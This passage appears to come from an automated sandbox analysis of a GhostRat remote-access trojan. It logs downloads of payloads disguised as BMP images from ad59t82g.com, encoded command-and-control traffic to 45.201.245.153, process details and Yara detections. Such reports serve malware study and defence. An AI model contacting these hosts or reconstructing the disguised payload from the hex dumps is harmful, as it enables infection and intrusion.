                                        Sep 14, 2024 18:31:08.031007051 CEST1236INData Raw: 7f e2 ff 22 54 8e 35 e1 35 0c 97 2a 69 cb 82 a8 a0 a5 9a 29 24 ca 1a 2a 28 e1 cd 30 05 84 69 8e 74 24 49 09 19 b6 46 dc b5 26 2e 87 11 a9 2c 2d 45 f3 78 cc a5 c7 e3 15 8c 48 fa 11 6d 02 f7 3d e5 ca 01 59 72 0a c7 d9 79 ea 51 5e 24 fb fa 1b c1 79
                                        Data Ascii: "T55*i)$*(0it$IF&.,-ExHm=YryQ^$y62@Ohj6dSk[I3f[M[KjT/c f*(tJ~muisyLvhG03Lw9XmcYOE5M +/+62
                                        Sep 14, 2024 18:31:08.031044006 CEST1236INData Raw: e7 83 60 3a 46 94 eb d2 41 b4 e4 ec be 87 58 f8 2f 41 b3 32 2c e0 a2 b5 1f c7 ac 7e 58 66 98 dd 0f 9d 1e ad ca 7c 80 38 2a 62 15 e4 35 50 ea 43 2d f5 6a 21 54 ee 2e 35 e2 4f 0f 06 cf 60 04 af 55 b0 02 97 ce e7 ef 24 2f 5e 4d 68 7c 90 2c e3 ab df
                                        Data Ascii: `:FAX/A2,~Xf|8*b5PC-j!T.5O`U$/^Mh|,s?Bg3Ynf9 B_E`I/*hwJPxw|30I'C?oKhZ71Ac>6u;sow )JCUS!Yi]
                                        Sep 14, 2024 18:31:13.757958889 CEST113OUTHEAD /1/d.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:14.001019955 CEST698INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:13 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 1236598
                                        Connection: keep-alive
                                        Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT
                                        ETag: "66d7438a-12de76"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: MISS
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p829%2F1DoPNZjLy9M6%2BAgrNGvt2O%2FPiMiWpq9hp33x3WqiVRw%2FtacoPyjvcCHx%2F6mqCn%2BMyVRfCq%2BYVEPcqkqxiHJnqTF2dO0%2FhDFUluYsnwJglKV%2B%2Bdl8DsfOJe%2FqH4%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c41f4fbb43d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Sep 14, 2024 18:31:14.009351015 CEST112OUTGET /1/d.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:14.138669014 CEST1236INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:14 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 1236598
                                        Connection: keep-alive
                                        Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT
                                        ETag: "66d7438a-12de76"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: HIT
                                        Age: 1
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvZO1dib4nCM9Ynf2RmY8AsJpq46TsnOYyfavyEU7BouohqFFo2xLjPXHL%2FM4PQaGqdJ3cYd%2FZkUpwx%2Bl%2BX4aG6TsCCbeDvNBXMsc2MMZMC5x0TdxhAnogANLgo7%2Fvw%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c420e91f43d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 97 08 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 88 c4 41 de e9 aa 12 de e9 aa 12 de e9 aa 12 b1 9f 34 12 ea e9 aa 12 b1 9f 00 12 46 e9 aa 12 b1 9f 01 12 f1 e9 aa 12 d7 91 29 12 dd e9 aa 12 d7 91 39 12 cf e9 aa 12 de e9 ab 12 04 e9 aa 12 b1 9f 05 12 ff e9 aa 12 b1 9f 31 12 df e9 aa 12 b1 9f 30 12 df e9 aa 12 b1 9f 37 12 df e9 aa 12 35 61 63 68 de e9 aa 12 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 ad 48 d7 66 67 08 00 00 67 08 00 00 87 08 02 21 6c 09 0a 00 67 b6 0a 00 67 38 09 00 67 08 00 00 43 55 08 00 [TRUNCATED]
                                        Data Ascii: BMv6(,, @*Rdcg'ggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICgA4F)91075achgg7M+Hfgg!lgg8gCUgggggbgbgg8gge@gggggwA>g8?gggggHgggggggg? 'gggggggggI
                                        Sep 14, 2024 18:31:16.073506117 CEST114OUTHEAD /1/t1.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:16.669313908 CEST676INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:16 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 2485
                                        Connection: keep-alive
                                        Last-Modified: Thu, 12 Sep 2024 11:36:25 GMT
                                        ETag: "66e2d239-9b5"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: MISS
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzH%2Fqa4S%2FVlr7tandhhaDbnkTnWsqZDTAEtjWsNK7e%2F3yqSRw0YaTWXKr4UAfEiK4HxM76qjWv6ASHMiyJ3i8ITdWh8MyzYhfSNYo81VNcxlC9QMAAot6ACVxwJrxU8%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c42dcd1f43d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Sep 14, 2024 18:31:16.670259953 CEST113OUTGET /1/t1.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:16.774032116 CEST1236INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:16 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 2485
                                        Connection: keep-alive
                                        Last-Modified: Thu, 12 Sep 2024 11:36:25 GMT
                                        ETag: "66e2d239-9b5"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: HIT
                                        Age: 0
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIWywWQrA6JzaWMCIeqlmcMb7eVxzlk2Pr2d%2Fch8aYd6yaYYOY%2By3hslyldAIOLl%2BNT9I8gwsAjWPtKZKMG2AMNGRu%2FyWx7X3t8BBX82MqEIW3nNBCan46TqwNBqX18%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c431792d43d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 4e 0e 00 00 54 c1 80 3c 66 6b 75 31 [TRUNCATED]
                                        Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8NT<fku1t}*d+|feu{|ckut}d|fetqIoZgj'g81$x S\$8D$|$g(P3,<#,|(_XCgT$#D$b@Vx,S\$8D$|$g$P3,<#,|$HGD_XCgT$#D$H,d@ #,W


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.44973945.201.245.153805408C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 14, 2024 18:31:36.209316969 CEST6OUTData Raw: 78 33 32 00
                                        Data Ascii: x32
                                        Sep 14, 2024 18:31:36.797843933 CEST1236INData Raw: 0e b0 04 00 00 00 00 00 00 00 00 00 00 00 c2 b9 2f 2b 2b 7e a0 c7 a8 c7 33 78 7d a0 5a 17 7c a2 7e df a0 6f 25 53 ae eb 5f 46 a8 57 25 57 2b 5f 4d a0 77 23 33 a2 76 d3 ae f0 5f 70 a0 7f 23 37 a0 5f 23 0b 28 fa a0 6f 23 0f 28 da a2 7e c3 28 ea 18
                                        Data Ascii: /++~3x}Z|~o%S_FW%W+_Mw#3v_p#7_#(o#(~(^n_(V,_<B+++$(h(^vT^_:^iYtupvV#+^:n$/{~/(|z~#~zN+++++s;+nnv~zzO+++x}|k'{?j
                                        Sep 14, 2024 18:31:36.797943115 CEST1236INData Raw: 11 41 2f 43 2b 3b 2b 2b d4 5d 2e 28 ed 78 a2 6e d3 d4 7e cf a0 f3 ae f0 5e 2f 18 eb c0 74 d4 5d 2e 78 d4 5d 22 7c d4 7e d3 a8 ef 3b a8 d3 d4 5f 0b 10 6d 2e 5e 30 a0 d0 18 f0 68 ab 15 2b a6 6e d7 7b a0 fc a6 66 f7 a6 6d 3a 5e 38 41 2b 7b c0 3a 43
                                        Data Ascii: A/C+;++].(xn~^/t].x]"|~;_m.^0h+n{fm:^8A+{:C+k++].x~{A+'_'C+k++].|~ntupv*+++++*++*+^+++GDJO++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                        Sep 14, 2024 18:31:36.797977924 CEST1236INData Raw: 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 7e a0 c7 7d a0 da a0 6d 2f ec 2d 37 5f 2a 3b ae eb 5f 25 43 2b ab 2b 2b 41 2b 7b d4 3e e3 7b 2a 3b dd 6e 23 2a 5f 22 7d c3 c6 73 2b 2b
                                        Data Ascii: +++++++++++++++++++++++++++++++++++++~}m/-7_*;_%C+++A+{>{*;n#*_"}s++/uv/+*7_*;b/_%C+++A+z>{*;~}e/|V'^/.m#(T+++n#e#|{z*++'V;+_f#U`x}#n?:~#$/))++n#<(/
                                        Sep 14, 2024 18:31:36.798015118 CEST388INData Raw: fb 10 fa 56 7f 18 f9 a0 ed dc da a0 6c 2f a8 17 bb 2b a6 2f bb 5e 3a a0 66 23 41 2b 7a 7b d4 3e 4f 7b 2a 3b ae eb 5f 0b 7d 6d 7d 78 d4 3e 4f 7b 2a 3b a0 6e d7 6b a2 6e d7 10 2c 59 9d a0 6e d3 75 70 a0 ce 76 e9 2f 2b 7d 6d 7d 78 d4 3e 4f 7b 2a 3b
                                        Data Ascii: Vl/+/^:f#A+z{>O{*;_}m}x>O{*;nkn,Ynupv/+}m}x>O{*;n*+++upnv/+~zxv#P/+^"pv#++++}n#hon++++UO|`//$]%|A+{>O{*;_~#}m}y>O{*;n#`oTntupv#+~#}m
                                        Sep 14, 2024 18:31:36.798049927 CEST1236INData Raw: 2b 2b 5f 05 a0 7e 27 a6 66 3b 7a 79 a6 ae d7 d0 d4 d4 7b c3 38 70 2b 2b a0 a5 9b 2b 2b 2b a0 ad fb 2b 2b 2b 7a a6 be d7 d0 d4 d4 7d 79 d4 fb a8 ef 33 a0 66 d7 18 e6 c3 9d 79 2b 2b a0 ce 76 e8 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ae a3 e3 2b 2b
                                        Data Ascii: ++_~'f;zy{8p++++++++z}y3fy++v+++_$++++_-*+++~x6*;}|C+++_!6*;.s++/$+++n#f'-++++++U;U?U3U7UU_USm+++mmkUo+++Ucm/S.++m#K.+++
                                        Sep 14, 2024 18:31:36.798088074 CEST1236INData Raw: a6 a5 b7 2b 2b 2b 10 22 5f 49 a8 e4 d4 a0 2a a0 7b 37 10 7d 33 5e 7e a0 7d 4f 10 7d 17 58 66 a0 3b a0 73 2f a2 71 2f a0 7b 2f a0 33 a2 31 ec 2b 2b 2b 2b 2b ec 6b 2f 2b 2b 2b 2b a0 bd bb 2b 2b 2b 2a 55 77 a2 7b 2f a6 bd a7 2b 2b 2b a2 3b a0 bd bb
                                        Data Ascii: +++"_I*{7}3^~}O}Xf;s/q/{/31+++++k/+++++++*Uw{/+++;+++)+++*+++*mO*m3"^mOmX!V+_/ec)n'tupv~f''R,v++++x}$+++++++$++++++}l#$+++fW(nn&*;o){_/.x
                                        Sep 14, 2024 18:31:36.798139095 CEST1236INData Raw: ec 2f 6b 10 ad 83 2b 2b 2b 59 f6 a0 26 bf 97 2a 3b a0 ad 8f 2b 2b 2b 7b ae e2 5f 2f d4 fa c0 2e c3 72 64 2b 2b a8 ef 2f a2 95 8f 2b 2b 2b 74 a2 b5 87 2b 2b 2b 70 a0 ad 83 2b 2b 2b a0 a5 8f 2b 2b 2b a0 7e 23 a6 2f ea a0 66 27 a2 3b a2 63 2f d4 ad
                                        Data Ascii: /k+++Y&*;+++{_/.rd++/+++t+++p++++++~#/f';c/+++vj7}3|U$+++$+++++++++x*+++_7s7z7_T,k/^*+++"j/323`/#*}w0*;z_/.e++*+++/_q,c7e3^{e
                                        Sep 14, 2024 18:31:36.798173904 CEST1236INData Raw: e7 7e a0 c7 a8 c7 4b 7d a0 db a0 6d 67 18 f9 7c a0 95 9f 2b 2b 2b a2 6e db a2 56 d7 a2 7e c7 a2 7e f7 12 7d 5b 24 af 9a 2e 2b 2b a0 25 a0 6d 17 a2 66 83 a0 65 4f 10 e3 58 2c 00 ea a2 6e df c0 28 a2 7e df a0 6d 33 a2 6e eb a0 ad 83 2b 2b 2b 78 18
                                        Data Ascii: ~K}mg|+++nV~~}[$.++%mfeOX,n(~m3n+++x~~n$+++nc3ne/Ug+++*_4+++_<yC_*;A*n'_6+++f~{+++}zy;V+++/#k/nn,MnMl/y+Ml-nl#d'ff
                                        Sep 14, 2024 18:31:36.798206091 CEST1236INData Raw: 7c 23 a0 68 37 a2 6c 27 a0 78 0b a2 7c 3b a0 68 0f a2 6c 3f a0 68 0f a8 ec 33 ae eb 5f 3f 7b a6 60 13 7a 7c c3 cf b4 2b 2b a0 66 db a8 ef 27 28 50 0f a0 78 1f 10 7d 57 59 2c ec 6d 27 d4 d4 d4 d4 a0 30 a6 ad bf 2b 2b 2b 10 f3 24 ae 57 d5 d4 d4 00
                                        Data Ascii: |#h7l'x|;hl?h3_?{`z|++f'(Px}WY,m'0+++$WVpU+++*_2++++_;|C_*;A*>'+++f+++{}|z;V+_m?m;m)X,m)+++m(n}#$mo+++V+_nm)X,m)+++e#*+++mo+++.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.44974045.201.245.153805408C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 14, 2024 18:31:39.230499983 CEST16OUTData Raw: 10 00 00 00 04 b1 4e 00 00 00 00 00 ca 00 2b 2f
                                        Data Ascii: N+/
                                        Sep 14, 2024 18:31:39.824506044 CEST115INData Raw: 73 00 00 00 04 b1 4e 00 00 00 00 00 ca 00 2b 4d dc 1d 2b 4e 2b 18 2b c7 2b 4b dc 40 2b 4e 2b 48 2b c5 2b 1c dc 1d 2b 1e 2b 49 2b c2 2b 49 dc 1c 2b 4f 2b 4f 2b c6 2b 1f dc 4d 2b 49 2b 19 2b 93 2b 1c dc 48 2b 1c 2b 18 2b 97 2b 1f dc 1d 2b 2b 2b 2b
                                        Data Ascii: sN+M+N+++K@+N+H++++I++I+O+O++M+I+++H++++++++++/y++++++/y++++++/y++++++
                                        Sep 14, 2024 18:31:39.824980974 CEST2643OUTData Raw: 53 0a 00 00 04 b1 4e 00 00 00 00 00 ca 00 2a 2f dc 79 2b 50 5d 7e 74 d4 41 78 8b 57 2b 4f 2b 47 2b 99 2b 70 dc 1b 2b 42 2b 45 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b
                                        Data Ascii: SN*/y+P]~tAxW+O+G++p+B+E++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+++++
                                        Sep 14, 2024 18:31:40.055646896 CEST1236INData Raw: 12 4a 04 00 04 b1 4e 00 00 00 00 00 ca 00 2e 2f dc 79 2b 50 5d 7e 74 d4 41 78 8b 57 2b 4f 2b 47 2b 99 2b 70 dc 1b 2b 42 2b 45 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b
                                        Data Ascii: JN./y+P]~tAxW+O+G++p+B+E++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+++++
                                        Sep 14, 2024 18:31:40.055705070 CEST1236INData Raw: dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79
                                        Data Ascii: y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y+
                                        Sep 14, 2024 18:31:40.055738926 CEST1236INData Raw: 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5
                                        Data Ascii: ++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++y~xyW|~~o!_FWW/w#3p#7~_'zo#(
                                        Sep 14, 2024 18:31:40.055789948 CEST1236INData Raw: 7f 1b 0b 28 e5 7c 66 db df af a0 67 1b 0f 28 3b a2 7a 30 f0 66 db 12 77 1b e1 5d 62 57 81 a0 2f b1 d4 5e f9 28 e9 8c f2 6e d7 d4 7b 3b 70 eb 5b f8 f2 7e c7 68 10 77 c2 3f 5d 3f 92 07 a0 6e d7 43 f5 6b 2f dc 86 5c 7b 7d d4 7b f9 18 ef 83 27 70 a0
                                        Data Ascii: (|fg(;z0fw]bW/^(n{;p[~hw?]?nCk/\{}{'pv~nW4$/s~/W4;(*o7~xyfN]a>+.Qm*(5_}C+;++]*xn^/t|x]"|~_;_i0n{xfQ?:^8A+>yk++
                                        Sep 14, 2024 18:31:40.055824041 CEST1236INData Raw: 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f dc 79 2b 2b 2b 2b 2b f5 2b 2f
                                        Data Ascii: +/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y++++++/y~}i-y(;p[+++A{Y(;n*[/H*+v+W
                                        Sep 14, 2024 18:31:40.055857897 CEST1236INData Raw: e9 61 08 24 28 f9 55 29 3f 18 f9 ae e2 fa b4 ed 96 5a e1 28 da a2 5b ed 75 a4 39 24 e8 e7 78 18 f0 cc 35 59 f6 2e a0 6d 2f a6 17 6d a0 28 5f 81 24 5d 3f a0 23 7e 3a 7f b6 79 79 d4 3e 73 09 f6 3b e8 db 79 2b 2b 2b 68 10 eb 59 f5 ef a2 74 a0 6d 2f
                                        Data Ascii: a$(U)?Z([u9$x5Y.m/m(_$]?#~:yy>s;y+++hYtm/6_8*+/uo/|y+p99h-v+n,F|Q&o}r/y$%-h+/e^>W4#A+z{>{z;_my>(;~nn,YCj$'pv
                                        Sep 14, 2024 18:31:40.055891991 CEST1236INData Raw: d8 f0 7a 2f a0 63 2f 7e 3b a6 cd f0 33 a2 73 2f 7b ce d8 5b d6 86 fd a0 1e 9f 1e f1 3b c4 d9 91 d1 ba 2a 2b a8 31 2f 14 e3 0c e4 a0 66 23 a6 4c a7 2f dc 79 10 14 5f 1d a0 0a a0 28 57 71 a0 7b 2f a2 7a f1 a0 67 d8 f2 3b a2 3a a2 33 7c 73 2b 8c 42
                                        Data Ascii: z/c/~;3s/{[;*+1/f#L/y_(Wq{/zg;:3|s+B_!~};.d*/_/^~f'W+++6_5B_!~};.d*/W4#/t/y_1{[;E*+#}rwrvrC+/U+++l/yz_!}tupvy/tuv


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.44974145.201.245.153805408C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 14, 2024 18:31:47.337352991 CEST4702OUTData Raw: 5e 12 00 00 f7 ba 4e 00 00 00 00 00 ca 00 24 22 d4 79 12 2b 19 2b 05 f5 1a 22 d3 79 13 2b 05 2b 19 f5 05 22 d1 79 0b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b
                                        Data Ascii: ^N$"y++"y++"y+++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
                                        Sep 14, 2024 18:31:47.581410885 CEST15INData Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 e8
                                        Data Ascii: N
                                        Sep 14, 2024 18:31:47.582704067 CEST15OUTData Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 e9
                                        Data Ascii: N
                                        Sep 14, 2024 18:31:59.298732042 CEST15OUTData Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb
                                        Data Ascii: N
                                        Sep 14, 2024 18:31:59.463129997 CEST16INData Raw: 10 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb 22
                                        Data Ascii: N"
                                        Sep 14, 2024 18:31:59.543032885 CEST574OUTData Raw: 3e 02 00 00 f7 ba 4e 00 00 00 00 00 ca 00 22 22 d5 79 0b 2b 46 2b 42 f5 45 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 b5 79 59 2b 44 2b 4c f5 59 22 84 79 46 2b 0b 2b 66 f5 4a 22 8b 79 4a 2b 4c 2b 4e f5 59 22 e5 79 2b 2b 2b 2b
                                        Data Ascii: >N""y+F+BE"y++++++"y++++++"yY+D+LY"yF++fJ"yJ+L+NY"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
                                        Sep 14, 2024 18:32:15.250242949 CEST15OUTData Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb
                                        Data Ascii: N
                                        Sep 14, 2024 18:32:15.413552999 CEST16INData Raw: 10 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb 22
                                        Data Ascii: N"
                                        Sep 14, 2024 18:32:15.515043020 CEST574OUTData Raw: 3e 02 00 00 f7 ba 4e 00 00 00 00 00 ca 00 22 22 d5 79 0b 2b 46 2b 42 f5 45 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 e5 79 2b 2b 2b 2b 2b f5 2b 22 b5 79 59 2b 44 2b 4c f5 59 22 84 79 46 2b 0b 2b 66 f5 4a 22 8b 79 4a 2b 4c 2b 4e f5 59 22 e5 79 2b 2b 2b 2b
                                        Data Ascii: >N""y+F+BE"y++++++"y++++++"yY+D+LY"yF++fJ"yJ+L+NY"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y++++++"y+++++
                                        Sep 14, 2024 18:32:33.250274897 CEST15OUTData Raw: 0f 00 00 00 f7 ba 4e 00 00 00 00 00 ca 00 eb
                                        Data Ascii: N


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:12:29:31
                                        Start date:14/09/2024
                                        Path:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\N6xnw0iEGs.exe"
                                        Imagebase:0x400000
                                        File size:31'561'216 bytes
                                        MD5 hash:8F6F306BA501A7E435DB720BB97CB1E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:12:31:34
                                        Start date:14/09/2024
                                        Path:C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                                        Imagebase:0x400000
                                        File size:6'453'568 bytes
                                        MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
